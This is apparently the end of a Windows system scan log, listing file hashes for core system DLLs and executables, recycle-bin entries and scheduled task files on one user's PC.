C:\Windows\SysNative\DriverStore\FileRepository\volume.inf_amd64_neutral_df8bea40ac96ca21\volsnap.sys [2010/11/21 04:23:47 | 000,295,808 | ---- | M] (Microsoft Corporation) MD5=0D08D2F3B3FF84E433346669B5E0F639 -- C:\Windows\winsxs\amd64_volume.inf_31bf3856ad364e35_6.1.7601.17514_none_73dcbcf012b4850e\volsnap.sys [color=#A23BEC]< MD5 for: WININET.DLL >[/color] [2015/02/20 02:28:25 | 002,358,784 | ---- | M] (Microsoft Corporation) MD5=36F99BD8A0F09BDBB7850A138845A014 -- C:\Windows\SysNative\wininet.dll [2015/02/20 02:28:25 | 002,358,784 | ---- | M] (Microsoft Corporation) MD5=36F99BD8A0F09BDBB7850A138845A014 -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17691_none_e4320a17b6ea768f\wininet.dll [2010/11/21 04:24:08 | 000,980,992 | ---- | M] (Microsoft Corporation) MD5=44214C94911C7CFB1D52CB64D5E8368D -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_8.0.7601.17514_none_1eaaa4a07717236e\wininet.dll [2014/11/22 02:28:21 | 002,358,272 | ---- | M] (Microsoft Corporation) MD5=4AF089160FE082E5EA5C4AA72782DCA2 -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17501_none_e433d769b6ea768f\wininet.dll [2014/11/22 02:00:20 | 001,888,256 | ---- | M] (Microsoft Corporation) MD5=5E4E0E43E0A5BF9F089696DFA7A3D677 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17501_none_88153be5fe8d0559\wininet.dll [2014/11/06 02:52:35 | 001,892,864 | ---- | M] (Microsoft Corporation) MD5=6DD7D61A8EF3DFEC4FAEFEB395E77424 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17420_none_8822232dfe830275\wininet.dll [2014/11/06 03:17:24 | 002,365,440 | ---- | M] (Microsoft Corporation) MD5=6FC2819A4F80AAB2DADEDFC1EFEE3C3F -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17420_none_e440beb1b6e073ab\wininet.dll [2014/09/19 00:59:11 | 001,810,944 | ---- | M] (Microsoft Corporation) MD5=7AE80F921027CF88CB9D0433088A3E55 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17358_none_882f3db7fe78ff91\wininet.dll [2014/07/25 11:52:06 | 002,266,624 | ---- | M] (Microsoft Corporation) MD5=8E71A5CB5312B8392D4DA4CA37BB5868 -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17239_none_e45691cbb6d03bc9\wininet.dll [2014/09/19 01:33:18 | 002,309,632 | ---- | M] (Microsoft Corporation) MD5=9D98D4F390F0B14A782F3B931E613A1A -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17358_none_e44dd93bb6d670c7\wininet.dll [2015/01/12 02:27:32 | 002,358,272 | ---- | M] (Microsoft Corporation) MD5=9DFE41A69DF70AAB75CB5BA8C1109EA2 -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17633_none_e42bdacbb6f011c7\wininet.dll [2013/11/08 13:13:40 | 001,818,112 | ---- | M] (Microsoft Corporation) MD5=B5EB5BD3066959611E1F7A80FD6CC172 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.16428_none_88216b07fe83d256\wininet.dll [2014/07/25 11:05:23 | 001,792,512 | ---- | M] (Microsoft Corporation) MD5=B945BAA81B4805AD6BDDF4D026DCFB47 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17239_none_8837f647fe72ca93\wininet.dll [2014/03/06 06:41:49 | 001,789,440 | ---- | M] (Microsoft Corporation) MD5=E4E829EE073E046B0EB19B5FECB19B8C -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17041_none_884f4ca9fe60df00\wininet.dll [2013/11/08 13:13:39 | 002,332,160 | ---- | M] (Microsoft Corporation) MD5=E6CB36B85BE59095337427E853A5B65A -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.16428_none_e440068bb6e1438c\wininet.dll [2015/02/20 02:01:25 | 001,888,256 | ---- | M] (Microsoft Corporation) MD5=EA6EA6912F27F05C61D8D747517EB47E -- C:\Windows\SysWOW64\wininet.dll [2015/02/20 02:01:25 | 001,888,256 | ---- | M] (Microsoft Corporation) MD5=EA6EA6912F27F05C61D8D747517EB47E -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17691_none_88136e93fe8d0559\wininet.dll [2014/03/06 07:22:40 | 002,260,480 | ---- | M] (Microsoft Corporation) MD5=F220BA78AB542C70211D73AE4729B2CD -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17041_none_e46de82db6be5036\wininet.dll [2015/01/12 02:00:17 | 001,888,256 | ---- | M] (Microsoft Corporation) MD5=F285D499EC42969D963CA49EADA63218 -- C:\Windows\winsxs\x86_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_11.2.9600.17633_none_880d3f47fe92a091\wininet.dll [2010/11/21 04:23:55 | 001,188,864 | ---- | M] (Microsoft Corporation) MD5=F6C5302E1F4813D552F41A0AC82455E5 -- C:\Windows\winsxs\amd64_microsoft-windows-i..tocolimplementation_31bf3856ad364e35_8.0.7601.17514_none_7ac940242f7494a4\wininet.dll [color=#A23BEC]< MD5 for: WININIT.EXE >[/color] [2009/07/14 02:39:52 | 000,129,024 | ---- | M] (Microsoft Corporation) MD5=94355C28C1970635A31B3FE52EB7CEBA -- C:\Windows\SysNative\wininit.exe [2009/07/14 02:39:52 | 000,129,024 | ---- | M] (Microsoft Corporation) MD5=94355C28C1970635A31B3FE52EB7CEBA -- C:\Windows\winsxs\amd64_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_8ce7aa761e01ad49\wininit.exe [2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\SysWOW64\wininit.exe [2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\winsxs\x86_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_30c90ef265a43c13\wininit.exe [color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color] [2010/11/21 04:24:29 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe [2010/11/21 04:24:29 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe [2014/03/04 12:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe [2014/03/04 12:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe [2014/03/04 10:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe [2014/03/04 10:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe [2014/07/17 03:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\SysNative\winlogon.exe [2014/07/17 03:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\SysNative\winlogon.exe [2014/07/17 03:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18540_none_cdc47ed1ebad0e4e\winlogon.exe [2014/07/17 03:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18540_none_cdc47ed1ebad0e4e\winlogon.exe [2014/07/16 04:23:23 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=98AA0BFEE089C7E5DADB94190D93456C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22750_none_ce434d9704d2c730\winlogon.exe [2014/07/16 04:23:23 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=98AA0BFEE089C7E5DADB94190D93456C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22750_none_ce434d9704d2c730\winlogon.exe [color=#A23BEC]< MD5 for: WS2_32.DLL >[/color] [2010/11/21 04:24:28 | 000,297,984 | ---- | M] (Microsoft Corporation) MD5=4BBFA57F594F7E8A8EDC8F377184C3F0 -- C:\Windows\SysNative\ws2_32.dll [2010/11/21 04:24:28 | 000,297,984 | ---- | M] (Microsoft Corporation) MD5=4BBFA57F594F7E8A8EDC8F377184C3F0 -- C:\Windows\winsxs\amd64_microsoft-windows-w..nfrastructure-ws232_31bf3856ad364e35_6.1.7601.17514_none_50ddb631e4f59005\ws2_32.dll [2010/11/21 04:23:55 | 000,206,848 | ---- | M] (Microsoft Corporation) MD5=7FF15A4F092CD4A96055BA69F903E3E9 -- C:\Windows\SysWOW64\ws2_32.dll [2010/11/21 04:23:55 | 000,206,848 | ---- | M] (Microsoft Corporation) MD5=7FF15A4F092CD4A96055BA69F903E3E9 -- C:\Windows\winsxs\x86_microsoft-windows-w..nfrastructure-ws232_31bf3856ad364e35_6.1.7601.17514_none_f4bf1aae2c981ecf\ws2_32.dll [color=#A23BEC]< HKEY_LOCAL_MACHINE\SYSTEM\Curr​entControlSet\Control\Session Manager\SubSystems /s >[/color] [color=#A23BEC]< %systemroot%\*. /mp /s >[/color] [color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color] [2015/02/21 01:27:59 | 000,418,304 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\Windows\system32\dxtmsft.dll [2015/02/21 01:27:55 | 000,285,696 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\Windows\system32\dxtrans.dll [2009/07/14 02:15:21 | 000,462,848 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\Windows\system32\FirewallAPI.dll [2014/08/21 07:26:21 | 001,237,504 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\Windows\system32\msxml3.dll [color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color] [color=#A23BEC]< %systemroot%\system32\drivers\​*.sys /lockedfiles >[/color] [color=#A23BEC]< %systemroot%\System32\config\*​.sav >[/color] [color=#A23BEC]< c:\$recycle.bin\*.* /s >[/color] [2014/10/06 11:18:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I04NL1Y.jpg [2014/10/22 00:48:06 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I0S1WOO.JPG [2014/10/06 11:18:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I4Y8F16.jpg [2015/03/07 23:18:50 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I4YD6RR.exe [2015/03/21 17:28:50 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I5IWMLD.jpg [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I61O15B.jpg [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I6F3W6J.jpg [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I72KEKT.jpg [2015/03/21 17:28:47 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I9M168Q.jpg [2015/02/21 16:49:26 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$I9RP7H8.jpg [2014/10/22 00:48:06 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IB4NWAI.JPG [2014/10/03 23:00:02 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IE5OBKH.exe [2014/10/22 00:48:00 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IEY77QJ.JPG [2014/10/06 11:18:14 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IFBLDW6.jpg [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IHNBNBZ.jpg [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IHOW4L3.jpg [2014/10/22 00:48:00 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IJZOG8F.JPG [2014/10/22 00:47:54 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IKUMS2M.JPG [2014/10/22 00:47:54 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$ILS3ZGW.JPG [2015/02/06 19:53:50 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IMEEGC1.pdf [2014/10/06 11:18:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IMEHXTU.jpg [2014/10/06 11:18:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IN7G8F0.jpg [2015/03/21 17:28:55 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IOM7CWK.jpg [2014/10/22 00:48:00 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IP0JYNK.JPG [2014/10/22 00:48:06 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IQSJ5KX.JPG [2015/02/06 19:53:28 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IRW5RM6.PNG [2015/03/21 17:28:32 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$ITWBG7N.jpg [2014/10/22 00:47:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$ITYAFDI.jpg [2014/10/22 00:47:54 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IV0EYV9.JPG [2015/02/06 00:07:22 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IV72C2D.asd [2014/10/22 00:48:00 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IW09ZF9.JPG [2014/10/06 11:18:46 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IWOHPAE.jpg [2014/10/06 11:18:14 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IXCXNSE.jpg [2015/04/02 01:40:59 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$IY5EBLW.jpg [2012/05/25 05:25:02 | 006,595,928 | ---- | M] (Yahoo! Inc.) -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R4YD6RR.exe [2015/02/22 21:51:11 | 000,084,619 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R5IWMLD.jpg [2015/02/21 21:43:03 | 000,063,580 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R61O15B.jpg [2015/02/21 21:42:46 | 000,055,307 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R6F3W6J.jpg [2015/02/21 21:43:12 | 000,051,313 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R72KEKT.jpg [2015/02/22 21:51:27 | 000,065,608 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R9M168Q.jpg [2014/10/29 23:56:18 | 000,066,767 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$R9RP7H8.jpg [2015/02/21 21:42:55 | 000,052,633 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RHNBNBZ.jpg [2015/02/21 21:43:29 | 000,056,220 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RHOW4L3.jpg [2015/02/06 19:46:42 | 000,055,257 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RMEEGC1.pdf [2015/02/22 22:57:27 | 000,064,137 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$ROM7CWK.jpg [2015/02/06 19:45:48 | 000,159,409 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RRW5RM6.PNG [2015/02/21 21:43:37 | 000,051,001 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RTWBG7N.jpg [2014/12/15 00:09:52 | 000,202,240 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RV72C2D.asd [2015/04/02 01:40:53 | 004,466,571 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\$RY5EBLW.jpg [2014/09/03 21:45:57 | 000,000,129 | -HS- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1000\desktop.ini [2014/11/26 14:59:49 | 000,000,544 | ---- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1003\$IMRGIO3.exe [2014/11/26 12:24:12 | 001,720,912 | ---- | M] (BitTorrent Inc.) -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1003\$RMRGIO3.exe [2014/11/26 12:20:02 | 000,000,129 | -HS- | M] () -- c:\$recycle.bin\S-1-5-21-3588181205-1423536317-4130440005-1003\desktop.ini [2009/07/14 06:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT [2009/07/14 06:08:49 | 000,032,496 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT [2014/09/03 22:42:43 | 000,001,014 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000Core.job [2014/09/03 22:42:44 | 000,001,066 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000UA.job [2014/09/05 00:42:18 | 000,000,894 | ---- | C] () -- C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000Core.job [2014/09/05 00:42:19 | 000,000,916 | ---- | C] () -- C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-3588181205-1423536317-4130440005-1000UA.job [2014/10/03 23:31:58 | 000,001,066 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job [2014/10/03 23:31:59 | 000,001,070 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job [2014/10/27 03:30:04 | 000,000,352 | ---- | C] () -- C:\Windows\Tasks\DriverToolkit Autorun.job [2014/11/26 13:04:46 | 000,000,320 | ---- | C] () -- C:\Windows\Tasks\Start Registry Reviver for hp-PC@houdaelgo(logon).job [2014/12/21 17:25:42 | 000,001,002 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job [2015/03/06 01:41:14 | 000,000,540 | ---- | C] () -- C:\Windows\Tasks\MATLAB R2014b Startup Accelerator.job < End of report >